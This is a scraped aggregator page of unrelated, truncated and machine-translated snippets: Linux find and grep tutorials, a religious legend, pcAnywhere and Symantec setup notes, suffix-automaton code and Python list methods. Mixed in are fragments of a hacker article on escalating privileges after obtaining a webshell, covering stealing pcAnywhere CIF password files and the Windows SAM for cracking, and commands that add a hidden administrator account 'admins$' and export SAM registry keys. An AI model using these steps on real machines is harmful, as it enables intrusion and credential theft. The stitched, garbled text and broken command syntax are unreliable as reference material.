find command first matches all files named "passwd*", such as passwd, Passwd.old, Passwd.bak, and then executes the grep command to see if there is a SAM user in these files.# find /etc -name "passwd*" -exec grep "sam" { } /;sam:x:501:501::/usr/sam:/bin/bashIi. examples of the Find command;1. Find all files under the current user's home directory:Here are two wa
. Michael, his brother, was defeated three days after the war, and nine mornings fell to hell in chaos. His younger brother, Michael, was promoted to an angel.(There are many versions of this legend, and some may say that the only thing that appeals Eve is Lucifer or aszler under Lucifer, but this has led to two rebellious conflicts between Lucifer and Lucifer, do not discuss)According to the legend above, it is clear that Lucifer is very violent and directly rebelled against God and took away 1
IP address has been 61.52.80. *, but recently it has become 221.15.145 .*. In this case, only a fixed IP address can be managed.
Since Version 11.0 of PcAnyWhere, it supports SecurID dual authentication. Using SecurID authentication, you do not need to restrict the IP address at all. The other party cannot connect even if they know the user name and password of PcAnyWhere.
TIPS: This article describes the PcAnyWhere SecurID dual authentication mechanism. If you are not familiar with PcAnyWhere,
"" >/temp/core.log# Cat/temp/core.log./file6In the current directory, look for files with read, write, and execute permissions for all users, and reclaim the appropriate write permissions:# ls-lDRWXRWXRWX 2 Sam adm 4096 October 20:14 File6-RWXRWXRWX 2 Sam Adm 0 October 01:01 http3.conf-RWXRWXRWX 2 Sam Adm 0 October 01:01 httpd.conf# Find. -perm-7-print | Xargs c
them, but give a hint before deleting them.$ find. -name "*.log"-mtime +5-ok rm {} \;Press the Y key to delete the file and press N to not delete it.Any form of command can be used in the-EXEC option.In the following example we use the grep command. The find command first matches all files named "passwd*", such as passwd, Passwd.old, Passwd.bak, and then executes the grep command to see if there is a SAM user in these files.# find/etc-name "passwd*"-
This article
Article Combined with the skills of many experts to improve permissions and some of their own ideas
When we get a webshell, the next step is to improve the permissions.
My personal summary is as follows:1: C: \ Documents ents and Settings \ All Users \ Application Data \ symantec \ pcAnywhere \Check whether you can jump to this directory. If you want to do so, just download its CIF file, get the pcAnywhere password, and log on to i
When we get a webshell, the next step is to improve the permissions.
My personal summary is as follows:
1: C: \ Documents ents and Settings \ All Users \ Application Data \ symantec \ pcAnywhere to see if they can jump to this directory. If the line is better, directly download its CIF file, get the pcAnywhere password and log on
2. c: \ winnt \ system32 \ config enter its Sam here to crack the user's passw
Author: Hannah
Article Source: http://blog.77169.com/more.asp? Name = atan19a and ID = 6866
The following is a summary of my claim. Many methods have not been tested or succeeded, but I did see that others have succeeded.
. I am not talented, except for the first method I studied, others are summed up by others' experience. Hope to help your friends!
1. Radmin connection method
The condition is that you have sufficient permissions and the other party does not even have the firewall. E
work on each file that is matched to it.In the following example, the Find command finds all filenames in the current directory. Log end, change files over the 5th, and delete them, but give a hint before deleting them.$ find. -name "*.conf"-mtime +5-ok rm {};Press the Y key to delete the file and press N to not delete it.Any form of command can be used in the-EXEC option.In the following example we use the grep command. The find command first matches all files named "passwd*", such as passwd,
authentication mechanism. If you are not familiar with PcAnyWhere, refer to the online help or other basic tutorials.
First, describe the required software, that is, Symantec PcAnyWhere and Symantec Packager. Of course, both of them need to be installed. In this way, our platform has been set up. Note that you need to install PcAnyWhere first and then Symantec P
Sepm? Migration / Disaster Recovery??condition: Replace server host / Reload the server system, but keep the host IP The address does not change and the hostname does not change. ??
Backup steps:
??
Login? Server console, enter " Administrator ",? Select "Server" and click on "local site" under " localhost " ,? Click "Back Up site now" in the taskbar ",
The dialog box appears, select OK
to Folder c:/program Files/
Links: http://www.spoj.com/problems/LCS/Test instructions two strings of LCSThere's really nothing to say, the first time. Let's turn over the online tutorial to see it again.Another found that Baidu internal users to communicate the use of pictures in the Baidu snapshot.#include #include#include#includeusing namespacestd;#defineMAXN 2510000#defineMaxt maxn*2structsam_node{intPnt,len; intnxt[ -]; voidPrint (intid=-1) {printf ("-----------------\ n"); printf ("
3238: [Ahoi2013] Difference time
limit:20 Sec Memory limit:512 MBsubmit:1420 solved:662[Submit] [Status] [Discuss]
DescriptionInputOne line, a string sOutputA row, an integer that represents the value evaluatedSample InputCacaoSample Output54HINT2ExercisesRight collection: Subtree sz size on PNT tree (NQ node not counted)The string is inverted to build the suffix automaton, the two states LCP is the PNT tree LCA Val, is also the string of two prefixes of the longest public suffix, that
Author: Nah article source: http://blog.77169.com/more.asp?name=atan19aid=6866
All of the following are my summary of the right time to sum up many methods so far no chance to test and did not succeed, but I did see others succeed
Of I am not, except the first method of their own research, the other is the experience of others summary. Hope to help a friend!
1.radmin Connection method
The condition is that you have enough permissions and the other person has no firewall. Package a radmin up,
a high load, start looking for all the files from the root directory. $ find/-name "*"-print if you want to find the file name in the current directory with two lowercase letters, followed by two digits, and finally the. txt file, the following command will be able to return a file named Ax37.txt: $find. -name "[A-z][a-z][0--9][0--9].txt"-print2. With PERM optionFollow the file permission mode with the-perm option to find files by file permission mode.It is best to use the octal permission nota
switch. In d a t. the f file contains the month character S e p t, both uppercase and lowercase. To obtain this string, use the following method: $ grep-I "48" data. f 1. Select the location of the city where the code is 4 8 4 and 4 8 3. You can use [] to specify the string range. $ Grep "48 [34]" data. f2. If the row does not match the beginning of the row, make it not 4 or 8. You can use the ^ mark in square brackets. $ Grep "^ [^ 48]" data. f if the string is 48 $ grep-v "^ [^ 48]" data. use
1. to add a new element ( object ) at the end of the listL.append (object)--Append object to end>>>l = [' Sam ', ' Shaw ', ' Stiven ']>>>l[' Sam ', ' Shaw ', ' Stiven ']>>>l.append (' Alice ')>>>l[' Sam ', ' Shaw ', ' Stiven ', ' Alice ']2. used to count the number of occurrences of an element in a list. L.count (value), integer--Returnnumber of occurrences of va
Copy Code code as follows:
NET user admins$ 1234567/add
net localgroup Administrators admins$/add
Echo Hkey_local_machine\sam [1] >>c:/tem.ini
Echo Hkey_local_machine\sam\sam [1] >>c:/tem.ini
Echo hkey ...
NET user admins$ 1234567/add
net localgroup Administrators admins$/add
Echo Hkey_local_machine\sam [1
the Authenticated Users Group.
Properly Disable the unnecessary service Disable unneeded services as appropriate:1. RAS2. redundant network protocols.3. Server4. Alerter5. Messenger
Protects IIS, including placing FTP files in a separate partition. You are running anonymous FTP with full read access permissions. Although this arrangement is better than password protection, you should ensure that the server does not allow itself to become part of a DoS attack that may compromise the root user.
N
The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion;
products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the
content of the page makes you feel confusing, please write us an email, we will handle the problem
within 5 days after receiving your email.
If you find any instances of plagiarism from the community, please send an email to:
info-contact@alibabacloud.com
and provide relevant evidence. A staff member will contact you within 5 working days.